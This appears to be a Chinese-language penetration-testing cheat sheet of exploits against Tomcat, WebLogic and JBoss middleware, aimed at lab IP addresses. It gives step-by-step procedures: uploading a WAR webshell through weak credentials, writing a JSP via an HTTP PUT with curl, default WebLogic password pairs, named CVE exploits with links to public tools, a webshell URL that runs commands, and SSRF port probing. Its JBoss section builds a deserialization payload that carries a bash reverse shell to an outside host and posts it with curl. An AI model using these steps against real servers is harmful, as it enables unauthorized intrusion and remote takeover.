一些中间件的漏洞

一、Tomcat

1、弱口令

(1)将shell.jsp压缩成shell.zip

(2)将后缀名改成shell.war

(3)192.168.88.152:8080/manager/html上传war包

(4)访问http://192.168.88.152:8080/shell/shell.jsp即可getshell

---

2、PUT方法写文件漏洞

curl -X PUT http://192.168.88.152:8080/shell.jsp/ -d @- < shell.jsp

使用" / "可绕过文件后缀的检测。

---

二、Weblogic

1、弱口令

weblogic后台：http://192.168.88.152:7001/console

常见弱口令：weblogic/weblogic、weblogic/Oracle@123、system/system

---

2、XMLDecoder反序列化（CVE-2017-10271）

(1)写文件

(2)/dev/tcp反弹shell

---

3、T3协议反序列化(CVE-2018-2628)，需要通过T3协议触发

(1)使用nmap扫描是否开启t3协议

nmap 192.168.88.152 -p7001 --script="weblogic-t3-info.nse"

(2)使用CVE-2018-2628-poc.py测试是否存在漏洞

(3)使用K8飞刀上传webshell

(4)使用cve-2018-2628.py连接webshell

工具：https://github.com/jas502n/CVE-2018-2628

---

4、任意文件上传漏洞(CVE-2018-2894)，需要启用web服务测试页

(1)http://192.168.88.152:7001/ws_utc/config.do页面存在未授权访问

(2)将Work Home Dir设置为css目录

/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

(3)点击安全--增加，然后上传webshell

(4)根据返回的时间戳，构造webshell地址

http://192.168.88.152:7001/ws_utc/css/config/keystore/1545874426954_muma.jsp?pwd=023&i=whoami

工具：https://github.com/LandGrey/CVE-2018-2894

---

5、SSRF

漏洞存在于http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp，访问以下url地址：

http://192.168.88.152:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001

端口开放，返回error code

端口关闭，返回could not connect over HTTP to server

如果目标开放了redis服务，可结合未授权访问进行攻击。

---

三、Jboss

1、JMX反序列化

使用DeserializeExploit.jar进行测试

---

2、5.x/6.x 反序列化漏洞(CVE-2017-12149)

工具：https://github.com/yunxu1/jboss-_CVE-2017-12149

---

3、JMS 反序列化(CVE-2017-7504)

javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap.java

java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap "bash -i >& /dev/tcp/192.168.88.154/4444 0>&1"

curl http://192.168.88.152:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @ExampleCommonsCollections1WithHashMap.ser

工具：https://github.com/joaomatosf/JavaDeserH2HC